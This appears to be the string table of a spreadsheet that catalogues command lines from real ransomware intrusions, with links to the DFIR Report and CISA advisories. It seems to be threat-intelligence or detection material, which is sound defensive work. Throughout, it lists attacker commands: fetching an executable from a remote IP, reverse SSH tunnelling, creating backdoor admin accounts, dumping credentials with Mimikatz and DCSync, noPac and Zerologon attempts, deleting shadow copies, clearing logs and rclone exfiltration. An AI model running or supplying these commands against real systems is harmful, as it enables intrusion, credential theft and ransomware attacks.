    <t xml:space="preserve">Named Pipe Creations </t>
  </si>
  <si>
    <t>cmd.exe /c "curl -sko %%temp%%\RfHBBgXXYF.exe https://91.191.209.46:8080/&lt;randomish&gt;</t>
  </si>
  <si>
    <t>ransom-eid1394</t>
  </si>
  <si>
    <t>C:\Program Files\Atlassian\Confluence\u1.bat</t>
  </si>
  <si>
    <t>C:\Windows\SERVIC~1\NETWORK~1\AppData\Local\Temp\RfHBBgXXYF.exe</t>
  </si>
  <si>
    <t>wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value</t>
  </si>
  <si>
    <t>net user noname Slepoy_123 /add /Passwordchng:Yes</t>
  </si>
  <si>
    <t>system</t>
  </si>
  <si>
    <t>C:\Windows\system32\net1 user noname Slepoy_123 /add /Passwordchg:Yes</t>
  </si>
  <si>
    <t>net localgroup Administrators noname /add</t>
  </si>
  <si>
    <t>C:\Windows\system32\net1 localgroup Administrators noname /add</t>
  </si>
  <si>
    <t>WMIC useraccount where name='noname' set passwordexpires=false</t>
  </si>
  <si>
    <t>ransom-eid1395</t>
  </si>
  <si>
    <t>ransom-eid1396</t>
  </si>
  <si>
    <t>ransom-eid1397</t>
  </si>
  <si>
    <t>ransom-eid1398</t>
  </si>
  <si>
    <t>ransom-eid1399</t>
  </si>
  <si>
    <t>ransom-eid1400</t>
  </si>
  <si>
    <t>C:\Program Files\Atlassian\Confluence\AnyDesk.exe</t>
  </si>
  <si>
    <t>{"user" : "Network Service"}</t>
  </si>
  <si>
    <t>anydesk.exe --install c:\programdata\anydesk --start-with-win -silent</t>
  </si>
  <si>
    <t>anydesk.exe  --start-service</t>
  </si>
  <si>
    <t>anydesk.exe --GET-ID</t>
  </si>
  <si>
    <t>anydesk.exe --SET-Password</t>
  </si>
  <si>
    <t>cmd.exe /S /D /c" echo P@ssword1 "</t>
  </si>
  <si>
    <t>ransom-eid1401</t>
  </si>
  <si>
    <t>ransom-eid1402</t>
  </si>
  <si>
    <t>ransom-eid1403</t>
  </si>
  <si>
    <t>ransom-eid1404</t>
  </si>
  <si>
    <t>ransom-eid1405</t>
  </si>
  <si>
    <t>anydesk, cmd</t>
  </si>
  <si>
    <t>Metasploit GetSystem</t>
  </si>
  <si>
    <t>zero.exe [TARGET_DC_NETBIOS_NAME] [TARGET_DC_MACHINE_ACCOUNT$] administrator -c "whoami"</t>
  </si>
  <si>
    <t>Failed Zerlogon (renamed binary)</t>
  </si>
  <si>
    <t>zerologon</t>
  </si>
  <si>
    <t>HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware</t>
  </si>
  <si>
    <t>reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber</t>
  </si>
  <si>
    <t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group="remote desktop" new enable=yes</t>
  </si>
  <si>
    <t>netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x32\mimidrv.sys</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x32\mimikatz.exe</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x32\mimilib.dll</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x32\mimilove.exe</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x64\mimidrv.sys</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x64\mimikatz.exe</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x64\mimilib.dll</t>
  </si>
  <si>
    <t>C:\Users\Uname\Desktop\mimikatz\x64\mimilove.exe</t>
  </si>
  <si>
    <t>ransom-eid1406</t>
  </si>
  <si>
    <t>ransom-eid1407</t>
  </si>
  <si>
    <t>ransom-eid1408</t>
  </si>
  <si>
    <t>ransom-eid1409</t>
  </si>
  <si>
    <t>ransom-eid1410</t>
  </si>
  <si>
    <t>ransom-eid1411</t>
  </si>
  <si>
    <t>ransom-eid1412</t>
  </si>
  <si>
    <t>.\mimikatz\x64\mimikatz.exe  "privilege::debug" "log .\!logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit</t>
  </si>
  <si>
    <t>C:\Windows\system32\NOTEPAD.exe C:\Users\User\Desktop\!logs\Result.txt</t>
  </si>
  <si>
    <t>Used Notepad to read mimikatz results</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe secretsdump.exe -hashes :[HASH REDACTED] [USERNAME REDACTED]@[IP ADDRESS REDACTED]</t>
  </si>
  <si>
    <t>ransom-eid1413</t>
  </si>
  <si>
    <t>ransom-eid1414</t>
  </si>
  <si>
    <t>C:\Users\User\Desktop\sessionresum_&lt;random&gt;</t>
  </si>
  <si>
    <t>cmd /c whoami</t>
  </si>
  <si>
    <t>cmd.exe /c dir</t>
  </si>
  <si>
    <t>cmd.exe net localgroup administrators</t>
  </si>
  <si>
    <t>ransom-eid1415</t>
  </si>
  <si>
    <t>ransom-eid1416</t>
  </si>
  <si>
    <t>ransom-eid1417</t>
  </si>
  <si>
    <t>Attempted PrintNightmare</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe wmiexec.exe :NTLM_HASH domain_admind@dc_ip</t>
  </si>
  <si>
    <t xml:space="preserve">C:\WINDOWS\SYSTEM32\NET1  USER NONAME SLEPOY_123 /DOMAIN /ADD </t>
  </si>
  <si>
    <t xml:space="preserve">C:\WINDOWS\SYSTEM32\NET1  GROUP "DOMAIN ADMINS" NONAME /DOMAIN /ADD </t>
  </si>
  <si>
    <t xml:space="preserve">C:\WINDOWS\SYSTEM32\NET1  GROUP "ENTERPRISE ADMINS" NONAME /DOMAIN /ADD </t>
  </si>
  <si>
    <t>ransom-eid1418</t>
  </si>
  <si>
    <t>ransom-eid1419</t>
  </si>
  <si>
    <t>ransom-eid1420</t>
  </si>
  <si>
    <t>ransom-eid1421</t>
  </si>
  <si>
    <t>cmd.exe /Q /C whoami 1 &gt; \\127.0.0.1\admin$\__&lt;random&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>ransom-eid1422</t>
  </si>
  <si>
    <t>powershell.exe -Noexit Get-AdPrincipalGroupMembership (Get-AdComputer &lt;host&gt; | Select-object name</t>
  </si>
  <si>
    <t>C:\users\User\Desktop\netscan\64-bit\netscan.exe</t>
  </si>
  <si>
    <t>netscan.exe</t>
  </si>
  <si>
    <t>mstc.exe</t>
  </si>
  <si>
    <t>mstsc.exe /v:</t>
  </si>
  <si>
    <t>ransom-eid1423</t>
  </si>
  <si>
    <t>ransom-eid1424</t>
  </si>
  <si>
    <t>c:users\noname\Appdata\local\{guid}\svhostss.exe</t>
  </si>
  <si>
    <t>elpaco-team.exe</t>
  </si>
  <si>
    <t>c:users\noname\Appdata\local\{guid}\svhostss.exe -e watch -pid 5544 -!</t>
  </si>
  <si>
    <t>c:users\noname\Appdata\local\{guid}\svhostss.exe -e ul1</t>
  </si>
  <si>
    <t>c:users\noname\Appdata\local\{guid}\svhostss.exe -e ul2</t>
  </si>
  <si>
    <t>svhostss.exe</t>
  </si>
  <si>
    <t>ransom-eid1425</t>
  </si>
  <si>
    <t>ransom-eid1426</t>
  </si>
  <si>
    <t>ransom-eid1427</t>
  </si>
  <si>
    <t>ransom-eid1428</t>
  </si>
  <si>
    <t>ransom-eid1429</t>
  </si>
  <si>
    <t>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svhostss “C:\\Users\\noname\\AppData\\Local\\F6A3737E-E3B0-8956-8261-0121C68105F3\\svhostss.exe\”</t>
  </si>
  <si>
    <t xml:space="preserve">Autorun registry add incomplete CMDLINE </t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage</t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %%{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage</t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Bypsass "Get-VM | Stop-VM"</t>
  </si>
  <si>
    <t>ransom-eid1430</t>
  </si>
  <si>
    <t>ransom-eid1431</t>
  </si>
  <si>
    <t>ransom-eid1432</t>
  </si>
  <si>
    <t>ransom-eid1433</t>
  </si>
  <si>
    <t>{"date": "2025-06", "url": "https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/", "tags": ["RansomHub"]}</t>
  </si>
  <si>
    <t>powershell.exe -Command PowerShell -Command "{ Get-VM | where { $_.Name -ne 'VM01' -and $_.Name -ne 'VM02' } | Stop-VM -Force</t>
  </si>
  <si>
    <t>powershell.exe -Command PowerShell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""</t>
  </si>
  <si>
    <t>cmd.exe /c ""vssadmin.exe Delete Shadows /all /quiet""</t>
  </si>
  <si>
    <t>cmd.exe /c ""fsutil behavior set SymlinkEvaluation R2L:1""</t>
  </si>
  <si>
    <t>cmd.exe /c ""fsutil behavior set SymlinkEvaluation R2R:1""</t>
  </si>
  <si>
    <t>cmd.exe /c wevtutil cl security</t>
  </si>
  <si>
    <t>cmd.exe /c wevtutil cl system</t>
  </si>
  <si>
    <t>cmd.exe /c wevtutil cl application</t>
  </si>
  <si>
    <t>"C:\Users\Uname\Desktop\x64\credentialsfileview-x64\CredntialsFileView.exe</t>
  </si>
  <si>
    <t>ransom-eid1434</t>
  </si>
  <si>
    <t>ransom-eid1435</t>
  </si>
  <si>
    <t>ransom-eid1436</t>
  </si>
  <si>
    <t>ransom-eid1437</t>
  </si>
  <si>
    <t>ransom-eid1438</t>
  </si>
  <si>
    <t>ransom-eid1439</t>
  </si>
  <si>
    <t>ransom-eid1440</t>
  </si>
  <si>
    <t>ransom-eid1441</t>
  </si>
  <si>
    <t>ransom-eid1442</t>
  </si>
  <si>
    <t>DCSync -4662</t>
  </si>
  <si>
    <t>lsadump::dcsync /domain:CHILD.DOMAIN.EXAMPLE /user:DOMAINADMINUSER /csv &gt; CHILD.csv</t>
  </si>
  <si>
    <t>net group "server_admins" /domain</t>
  </si>
  <si>
    <t>net group "domain computers" /domain</t>
  </si>
  <si>
    <t>net accounts</t>
  </si>
  <si>
    <t>route print</t>
  </si>
  <si>
    <t>ping &lt;host&gt;</t>
  </si>
  <si>
    <t>ransom-eid1443</t>
  </si>
  <si>
    <t>ransom-eid1444</t>
  </si>
  <si>
    <t>ransom-eid1445</t>
  </si>
  <si>
    <t>ransom-eid1446</t>
  </si>
  <si>
    <t>ransom-eid1447</t>
  </si>
  <si>
    <t>ransom-eid1448</t>
  </si>
  <si>
    <t>ransom-eid1449</t>
  </si>
  <si>
    <t>ransom-eid1450</t>
  </si>
  <si>
    <t>ransom-eid1451</t>
  </si>
  <si>
    <t>ransom-eid1452</t>
  </si>
  <si>
    <t>ransom-eid1453</t>
  </si>
  <si>
    <t>ransom-eid1454</t>
  </si>
  <si>
    <t>"C:&lt;redacted&gt;\A[[Data\Local\Temp\4\Advanced IP Scanner 2\advanced_ip_scanner.exe" /portable "C:&lt;redacted&gt;\Downloads" /lng en_us</t>
  </si>
  <si>
    <t>ransom-eid1455</t>
  </si>
  <si>
    <t>C:\Windows\delete.me</t>
  </si>
  <si>
    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\dnsmgmt.msc</t>
  </si>
  <si>
    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\dsa.msc</t>
  </si>
  <si>
    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\dssite.msc</t>
  </si>
  <si>
    <t>C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding</t>
  </si>
  <si>
    <t>ransom-eid1456</t>
  </si>
  <si>
    <t>ransom-eid1457</t>
  </si>
  <si>
    <t>ransom-eid1458</t>
  </si>
  <si>
    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\domain.msc</t>
  </si>
  <si>
    <t>ransom-eid1459</t>
  </si>
  <si>
    <t>hkey_local_machine\\software\\policies\\microsoft\\windows nt\\terminal services\\fdenytsconnections</t>
  </si>
  <si>
    <t>Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) &amp; "C:\ProgramData\Veeam\rcl.bat" &amp; Chr(34), 0
Set WshShell = Nothing</t>
  </si>
  <si>
    <t>rclone copy [REDACTED]:/mnt/sdd/REDACTED --include-from include.txt</t>
  </si>
  <si>
    <t>aipscanner</t>
  </si>
  <si>
    <t>ransom-eid1460</t>
  </si>
  <si>
    <t>ransom-eid1461</t>
  </si>
  <si>
    <t>ransom-eid1462</t>
  </si>
  <si>
    <t>ransom-eid1463</t>
  </si>
  <si>
    <t>{"date": "2025-04", "url": "https://thedfirreport.com/2025/04/28/navigating-through-the-fog/", "tags": ["Fog"]}</t>
  </si>
  <si>
    <t>proxychains dpapi.py backupkeys -t fourlis.net/&lt;redacted&gt; --export</t>
  </si>
  <si>
    <t>proxychains dpapi.py backupkeys -t -hashes fourlis.net/&lt;redacted&gt; --export</t>
  </si>
  <si>
    <t>netextender &lt;target IP address&gt; –username &lt;target username&gt; –password &lt;username password&gt; –domain &lt;target domain name&gt; –always-trust</t>
  </si>
  <si>
    <t>NetExec</t>
  </si>
  <si>
    <t>pipx install git+https://github.com/Pennyw0rth/NetExec</t>
  </si>
  <si>
    <t>netexec</t>
  </si>
  <si>
    <t>pipx upgrade netexec</t>
  </si>
  <si>
    <t>proxychains nxc smb &lt;ipaddress&gt;</t>
  </si>
  <si>
    <t>proxychains nxc smb &lt;ipaddress&gt; -u &lt;redact&gt; -p &lt;redact&gt;</t>
  </si>
  <si>
    <t>ransom-eid1464</t>
  </si>
  <si>
    <t>ransom-eid1465</t>
  </si>
  <si>
    <t>ransom-eid1466</t>
  </si>
  <si>
    <t>ransom-eid1467</t>
  </si>
  <si>
    <t>ransom-eid1468</t>
  </si>
  <si>
    <t>ransom-eid1469</t>
  </si>
  <si>
    <t>ransom-eid1470</t>
  </si>
  <si>
    <t>ransom-eid1471</t>
  </si>
  <si>
    <t>netextender</t>
  </si>
  <si>
    <t>powershell -command "(new-object System.Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.exe', 'C:\ProgramData\AnyDesk.exe')"</t>
  </si>
  <si>
    <t>pshell, anydesk</t>
  </si>
  <si>
    <t>cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent</t>
  </si>
  <si>
    <t>cmd.exe /c echo Admin#123 | C:\ProgramData\anydesk.exe --set-password</t>
  </si>
  <si>
    <t>cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id</t>
  </si>
  <si>
    <t>ransom-eid1472</t>
  </si>
  <si>
    <t>ransom-eid1473</t>
  </si>
  <si>
    <t>ransom-eid1474</t>
  </si>
  <si>
    <t>ransom-eid1475</t>
  </si>
  <si>
    <t>proxychains python DonPAPI.py -pvk &lt;redact&gt;@ip.txt --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o</t>
  </si>
  <si>
    <t>proxychains python3 DonPAPI.py -pvk &lt;redact&gt;@ip.txt --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o</t>
  </si>
  <si>
    <t>sudo git clone https://github.com/SecurAuthCorp/impacket.git /opt/impacket</t>
  </si>
  <si>
    <t>sudo pip3 install -r /opt/impacket/requirements.txt</t>
  </si>
  <si>
    <t>cd /opt/impacket/</t>
  </si>
  <si>
    <t>proxychains impacket-dpapi backupkeys -t &lt;redacted&gt; --export</t>
  </si>
  <si>
    <t>impacket-dpapy</t>
  </si>
  <si>
    <t>impacket-dpapi</t>
  </si>
  <si>
    <t>proxychains dpapi.py backupkeys -t &lt;redacted&gt;@10.1.45.2 --export</t>
  </si>
  <si>
    <t>proxychains dpapi.py backupkeys -t -hashes &lt;redacted&gt;@10.0.16.40 --export</t>
  </si>
  <si>
    <t>proxychains dpapi.py backupkeys  -hashes &lt;redacted&gt;@10.0.3.10 --export</t>
  </si>
  <si>
    <t>ransom-eid1476</t>
  </si>
  <si>
    <t>ransom-eid1477</t>
  </si>
  <si>
    <t>ransom-eid1478</t>
  </si>
  <si>
    <t>ransom-eid1479</t>
  </si>
  <si>
    <t>ransom-eid1480</t>
  </si>
  <si>
    <t>ransom-eid1481</t>
  </si>
  <si>
    <t>ransom-eid1482</t>
  </si>
  <si>
    <t>ransom-eid1483</t>
  </si>
  <si>
    <t>ransom-eid1484</t>
  </si>
  <si>
    <t>ransom-eid1485</t>
  </si>
  <si>
    <t>ransom-eid1486</t>
  </si>
  <si>
    <t>dpapi.py -h</t>
  </si>
  <si>
    <t>dpapi.py --help</t>
  </si>
  <si>
    <t>ransom-eid1487</t>
  </si>
  <si>
    <t>ransom-eid1488</t>
  </si>
  <si>
    <t>certipy</t>
  </si>
  <si>
    <t>proxychains cd certipy</t>
  </si>
  <si>
    <t>cd certipy</t>
  </si>
  <si>
    <t>proxychains certipy find -u &lt;redacted&gt; -p &lt;redacted&gt; -dc-ip &lt;ipaddress&gt; -scheme ldap</t>
  </si>
  <si>
    <t>git clone https://github.com/ly4k/Certipy</t>
  </si>
  <si>
    <t>cd Certipy</t>
  </si>
  <si>
    <t>ransom-eid1489</t>
  </si>
  <si>
    <t>ransom-eid1490</t>
  </si>
  <si>
    <t>ransom-eid1491</t>
  </si>
  <si>
    <t>ransom-eid1492</t>
  </si>
  <si>
    <t>ransom-eid1493</t>
  </si>
  <si>
    <t>ransom-eid1494</t>
  </si>
  <si>
    <t>ransom-eid1495</t>
  </si>
  <si>
    <t>ransom-eid1496</t>
  </si>
  <si>
    <t>ransom-eid1497</t>
  </si>
  <si>
    <t>git clone https://github.com/trustedsec/orpheus</t>
  </si>
  <si>
    <t>cd orpheus</t>
  </si>
  <si>
    <t>ransom-eid1498</t>
  </si>
  <si>
    <t>ransom-eid1499</t>
  </si>
  <si>
    <t>orpheus</t>
  </si>
  <si>
    <t>gitclone https://github.com/bb00/zer0dump.git</t>
  </si>
  <si>
    <t>proxychains gitclone https://github.com/bb00/zer0dump.git</t>
  </si>
  <si>
    <t>git clone https://github.com/bb00/zer0dump.git</t>
  </si>
  <si>
    <t>cd zer0dump</t>
  </si>
  <si>
    <t>proxychains python3 zer0dump.py</t>
  </si>
  <si>
    <t>ransom-eid1500</t>
  </si>
  <si>
    <t>ransom-eid1501</t>
  </si>
  <si>
    <t>ransom-eid1502</t>
  </si>
  <si>
    <t>ransom-eid1503</t>
  </si>
  <si>
    <t>ransom-eid1504</t>
  </si>
  <si>
    <t>zer0dump</t>
  </si>
  <si>
    <t>git clone https://github.com/ly4k/Pachine</t>
  </si>
  <si>
    <t>cd Pachine</t>
  </si>
  <si>
    <t>proxychains python3 pachine.py -dc-host</t>
  </si>
  <si>
    <t>pachine</t>
  </si>
  <si>
    <t>ransom-eid1505</t>
  </si>
  <si>
    <t>ransom-eid1506</t>
  </si>
  <si>
    <t>ransom-eid1507</t>
  </si>
  <si>
    <t>noPac</t>
  </si>
  <si>
    <t>proxychains python3 noPac.py &lt;redacted&gt; -dc-ip &lt;ipaddress&gt; -dc-host &lt;redact&gt; -shell --impersonate administrator</t>
  </si>
  <si>
    <t>nopac</t>
  </si>
  <si>
    <t>ransom-eid1508</t>
  </si>
  <si>
    <t>ransom-eid1509</t>
  </si>
  <si>
    <t>git clone https://github.com/Ridter/noPac</t>
  </si>
  <si>
    <t>cd noPac/</t>
  </si>
  <si>
    <t>python3 noPac.py</t>
  </si>
  <si>
    <t>proxychains</t>
  </si>
  <si>
    <t>sudo apt install proxychains</t>
  </si>
  <si>
    <t>sudo nano /etc/proxychains.conf</t>
  </si>
  <si>
    <t>proxychains scanner.py -dc-ip &lt;ip&gt; &lt;redacted&gt; -use-ldap</t>
  </si>
  <si>
    <t>pyscanner</t>
  </si>
  <si>
    <t>ransom-eid1510</t>
  </si>
  <si>
    <t>ransom-eid1511</t>
  </si>
  <si>
    <t>ransom-eid1512</t>
  </si>
  <si>
    <t>ransom-eid1513</t>
  </si>
  <si>
    <t>ransom-eid1514</t>
  </si>
  <si>
    <t>ransom-eid1515</t>
  </si>
  <si>
    <t>ransom-eid1516</t>
  </si>
  <si>
    <t>ransom-eid1517</t>
  </si>
  <si>
    <t>proxychains python3 pachine.py -dc-host &lt;redacted&gt; -scan</t>
  </si>
  <si>
    <t>Powercat</t>
  </si>
  <si>
    <t>certipy, proxychains</t>
  </si>
  <si>
    <t>certipy, git</t>
  </si>
  <si>
    <t>certutil, screenconnect</t>
  </si>
  <si>
    <t>cmd, echo, pipe</t>
  </si>
  <si>
    <t>cmd, echo, pipe, dllhost</t>
  </si>
  <si>
    <t>cmd, copy</t>
  </si>
  <si>
    <t>cmd, c$</t>
  </si>
  <si>
    <t xml:space="preserve"> impacket</t>
  </si>
  <si>
    <t>report</t>
  </si>
  <si>
    <t>date</t>
  </si>
  <si>
    <t>tag</t>
  </si>
  <si>
    <t>label</t>
  </si>
  <si>
    <t>status</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/</t>
  </si>
  <si>
    <t>2025-06</t>
  </si>
  <si>
    <t>dfir-intel_report</t>
  </si>
  <si>
    <t>ransomhub</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/</t>
  </si>
  <si>
    <t>2025-05</t>
  </si>
  <si>
    <t>elpaco</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2025/04/28/navigating-through-the-fog/</t>
  </si>
  <si>
    <t>2025-04</t>
  </si>
  <si>
    <t>fog</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/</t>
  </si>
  <si>
    <t>2025-03</t>
  </si>
  <si>
    <t>blacksuit</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf</t>
  </si>
  <si>
    <t>cisa-stop_ransom</t>
  </si>
  <si>
    <t>medusa</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/</t>
  </si>
  <si>
    <t>2025-02</t>
  </si>
  <si>
    <t>lockbit</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf</t>
  </si>
  <si>
    <t>ghost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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/</t>
  </si>
  <si>
    <t>2024-09</t>
  </si>
  <si>
    <t>alphv, blackcat</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2024-09/aa24-242a-stopransomware-ransomhub-ransomware_1.pdf</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2024/08/26/blacksuit-ransomware/</t>
  </si>
  <si>
    <t>2024-08</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/</t>
  </si>
  <si>
    <t>2024-06</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf</t>
  </si>
  <si>
    <t>2024-04</t>
  </si>
  <si>
    <t>akira</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/</t>
  </si>
  <si>
    <t>dagonlocker</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2024-02/aa24-060a-stopransomware-phobos-ransomware_1.pdf</t>
  </si>
  <si>
    <t>2024-02</t>
  </si>
  <si>
    <t>phobos</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf</t>
  </si>
  <si>
    <t>2023-12</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2023-12/aa23-352a-stopransomware-play-ransomware.pdf</t>
  </si>
  <si>
    <t>play</t>
  </si>
  <si>
    <t>https://www.cisa.gov/sites/default/files/2023-11/aa23-325a_lockbit_3.0_ransomware_affiliates_exploit_cve-2023-4966_citrix_bleed_vulnerability_0.pdf</t>
  </si>
  <si>
    <t>2023-11</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/</t>
  </si>
  <si>
    <t>2023-09</t>
  </si>
  <si>
    <t>hive</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/</t>
  </si>
  <si>
    <t>2023-08</t>
  </si>
  <si>
    <t>nokoyawa</t>
  </si>
  <si>
    <t>https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection</t>
  </si>
  <si>
    <t>2023-05</t>
  </si>
  <si>
    <t>kroll-blog</t>
  </si>
  <si>
    <t>cactus</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/</t>
  </si>
  <si>
    <t>2023-04</t>
  </si>
  <si>
    <t>unknkown</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/</t>
  </si>
  <si>
    <t>2022-11</t>
  </si>
  <si>
    <t>unknown</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/</t>
  </si>
  <si>
    <t>2022-08</t>
  </si>
  <si>
    <t>bumblebee</t>
  </si>
  <si>
    <t>https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/</t>
  </si>
  <si>
    <t>2022-06</t>
  </si>
  <si>
    <t>msft_ti-blog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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/</t>
  </si>
  <si>
    <t>2022-04</t>
  </si>
  <si>
    <t>conti</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/</t>
  </si>
  <si>
    <t>2022-03</t>
  </si>
  <si>
    <t>talos-blog</t>
  </si>
  <si>
    <t>blackcat, blackmatter</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/</t>
  </si>
  <si>
    <t>2021-11</t>
  </si>
  <si>
    <t>https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf</t>
  </si>
  <si>
    <t>2021-10</t>
  </si>
  <si>
    <t>conti_playbook</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/</t>
  </si>
  <si>
    <t>https://talosintelligence.com/resources/269</t>
  </si>
  <si>
    <t>2021-09</t>
  </si>
  <si>
    <t>talos-conti_playbook</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/05/12/conti-ransomware/</t>
  </si>
  <si>
    <t>2021-05</t>
  </si>
  <si>
    <t>https://labs.withsecure.com/publications/prelude-to-ransomware-systembc</t>
  </si>
  <si>
    <t>withsecure-blog</t>
  </si>
  <si>
    <t>systembc</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/</t>
  </si>
  <si>
    <t>2021-03</t>
  </si>
  <si>
    <t>revil</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/01/31/bazar-no-ryuk/</t>
  </si>
  <si>
    <t>2021-01</t>
  </si>
  <si>
    <t>ryuk</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/10/08/ryuks-return/</t>
  </si>
  <si>
    <t>2020-10</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/06/10/lockbit-ransomware-why-you-no-spread/</t>
  </si>
  <si>
    <t>2020-06</t>
  </si>
  <si>
    <t>reviewed</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/</t>
  </si>
  <si>
    <t>2025-07</t>
  </si>
  <si>
    <t>interlock</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/</t>
  </si>
  <si>
    <t>2025-08</t>
  </si>
  <si>
    <t>Bumblebee Image load via msimg32.dll</t>
  </si>
  <si>
    <t>wbadmin.exe start backup -backuptarget:\\127.0.0.1\C$\ProgramData\ -include":C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY" -quiet</t>
  </si>
  <si>
    <t>wbadmin, ntds</t>
  </si>
  <si>
    <t>ssh root@193.242.184.150 -R *:10400 -p22</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
